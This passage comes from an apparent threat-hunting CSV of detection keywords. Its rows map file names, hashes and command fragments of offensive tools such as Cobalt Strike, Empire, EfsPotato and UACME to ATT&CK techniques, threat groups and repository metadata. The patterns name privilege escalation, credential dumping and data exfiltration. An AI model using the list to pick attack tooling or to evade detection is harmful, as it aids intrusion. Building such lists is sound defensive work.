Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EEC35BCF-E990-4260-828D-2B4F9AC97269*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*eeriedusk/nysm*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*EfsPotato-*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*EfsPotato*efsrpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*lsarpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*lsarpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*lsass*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*netlogon*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*samr*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato-main*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*egblhcjfjmbjajhjhpmnlekffgaemgfh*","greyware_tool_keyword","Fornex VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*EgeBalci/amber@latest*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*EggShell.py*","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","10","1563","404","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z" +"*Egress-Assess Exfil Data*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email subject","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Egress-Assess Report*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Egress-Assess transfer share*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*EgressAssess With Attachment*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email body","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Egress-Assess.*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*EgressAssess.ps1*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Egress-Assess-master*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*egressbuster*","offensive_tool_keyword","egressbuster","EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. Most companies have special exceptions and allow ports but they may be difficult to find.","T1046 - T1570 - T1590","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/trustedsec/egressbuster","1","1","N/A","N/A","4","327","104","2021-02-17T00:54:07Z","2015-05-14T02:19:26Z" +"*egresscheck-framework*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ehbhfpfdkmhcpaehaooegfdflljcnfec*","greyware_tool_keyword","WeVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*eidnihaadmmancegllknfbliaijfmkgo*","greyware_tool_keyword","Push VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ejabberd2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ejkaocphofnobjdedneohbbiilggdlbi*","greyware_tool_keyword","Hotspot Shield Elite VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*elastic-agent.exe uninstall*","greyware_tool_keyword","elastic-agent","uninstall elast-agent from the system","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","6","8","N/A","N/A","N/A","N/A" +"*eldraco/domain_analyzer*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*electrum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*elevate juicypotato *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*elevate Printspoofer*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","0","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*elevate svc-exe *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*ElevatePrivs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*elevationstation.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation.git*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation-main*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*ElevenPaths*FOCA*","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","10","2495","518","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z" +"*ELFLoader.c*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*ELFLoader.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*ELFLoader.out*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*elite-proxy-finder*","offensive_tool_keyword","elite-proxy-finder","Finds elite anonymity (L1) HTTP proxies then tests them all in parallel. Tests each proxy against 3 IP checking URLs including one which is HTTPS to make sure it can handle HTTPS requests. Then checks the proxy headers to confirm its an elite L1 proxy that will not leak any extra info. By default the script will only print the proxy IP. request time. and country code of proxies that pass all four tests but you can see all the results including errors in any of the tests with the -a (--all) option.","T1586.001 - T1041.002 - T1105.002 - T1573.001 - T1135.002 - T1134.002 - T1016.001","TA0011 - TA0010 - TA0005 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/DanMcInerney/elite-proxy-finder","1","1","N/A","N/A","3","247","106","2016-11-23T10:31:33Z","2014-04-17T11:23:20Z" +"*emailall.py -*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*emailall.py check*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*EmailAll-master.*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*embedInHTML.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*embedInHTML.py*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*EmbedInHTML-master*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*empire AttackServers*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - 